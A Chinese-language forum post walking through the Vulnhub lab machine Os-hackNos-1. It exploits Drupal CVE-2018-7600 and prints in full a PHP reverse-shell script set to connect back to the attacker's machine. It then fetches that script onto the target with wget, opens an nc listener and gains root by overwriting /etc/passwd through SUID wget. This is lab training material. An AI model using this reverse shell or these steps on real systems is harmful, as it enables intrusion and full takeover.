Vulnhub靶机练习笔记-Os-hackNos-1

boy0s   ·   发表于 2023-05-17 16:09:25   ·   CTF&WP专版

vulnhub靶机下载

https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

靶场环境:

NAT模式
kali:192.168.242.131
靶机:192.168.242.142

渗透

nmap探测靶机

开放了80和22端口

dirsearch对80端口进行目录扫描,发现drupal目录

dirb也扫一边,貌似dirb扫到的结果比dirsearch多,所以在实战的时候可以用多个不同的工具进行信息收集,这样才更全面

访问drupal目录,是一个登录界面,弱口令登录测试无果,换换别的思路

前面dirb发现在drupal目录下有robots.txt文件,说不定里面有啥线索
好家伙,网站的路径全都暴露出来了,看到CHANGELOG.txt这个文件

这里给出了Drupal的版本是7.57,百度搜一下该版本的漏洞看看能否直接利用

百度后找到CVE-2018-7600,Drupal 7.x 和 8.x 的多个子系统中存在一个远程执行代码漏洞。
下载exp

exp成功执行,存在命令执行漏洞

-c参数加命令

到这里的思路就很清晰了,上传木马,反弹shell
先在本地写一段php的反弹shell木马
修改ip为kali的ip,监听端口10086


  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey<span class="label label-primary">@pentestmonkey.net#CTL{n}#CTL{n}</span>  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '192.168.242.131';  // You have changed this
  $port = 10086;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;

  //
  // Daemonise ourself if possible to avoid zombies later
  //

  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
    }
    if ($pid) {
      exit(0);  // Parent exits
    }
    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
    }
    $daemon = 1;
  } else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }
  // Change to a safe directory
  chdir("/");

  // Remove any umask we inherited
  umask(0);

  //
  // Do the reverse shell...
  //

  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
  }
  // Spawn shell process
  $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 =&gt; array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 =&gt; array("pipe", "w")   // stderr is a pipe that the child will write to
  );

  $process = proc_open($shell, $descriptorspec, $pipes);

  if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
  }
  // Set everything to non-blocking
  // Reason: Occsionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);

  printit("Successfully opened reverse shell to $ip:$port");

  while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
    }
    // Check for end of STDOUT
    if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
    }
    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
    }
    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
    }
    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
    }
  }
  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);

  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
    if (!$daemon) {
      print "$string
";
    }
  }
  ?&gt;

用python开http服务,把木马在该目录

ev.php就是刚刚的木马

利用exp执行命令wget下载木马到靶机

查看一下

打开nc监听

访问ev.php

成功反弹

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’切换完整的交互式bash

此目录下的alexander.txt有一段base64编码的密文

解一下,发现还有一段Brainfuck

继续解,解完是一个账号和密码

切到james的目录下找到第一个flag

提权

先看看suid提权,需要搜索到,带有s的文件
普通用户也可执行wget

现在提权的思路就是先下载靶机上的passwd,然后添加一个有root权限的用户到构造的passwd文件中,然后使用wget -O把构造的passwd内容重定向输入到原本的/etc/passwd中

把内容复制出来到kali上

构造一个账户

添加到kali构造的passwd文件,加上root权限

还是用exp命令执行wget -O重定向

登录eval账号
root权限,成功提权

~目录下找到第二个flag

用户名金币积分时间理由
Track-子羽 50.00 0 2023-05-19 13:01:21 活动奖励翻倍
Track-子羽 50.00 0 2023-05-19 13:01:59 一个受益终生的帖子~~

打赏我,让我更有动力~

2 条回复   |  直到 2023-5-30 | 618 次浏览

杜星翰
发表于 2023-5-20

11111111111

评论列表

  • 加载数据中...

编写评论内容

oldmanpushcar
发表于 2023-5-30

膜拜

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.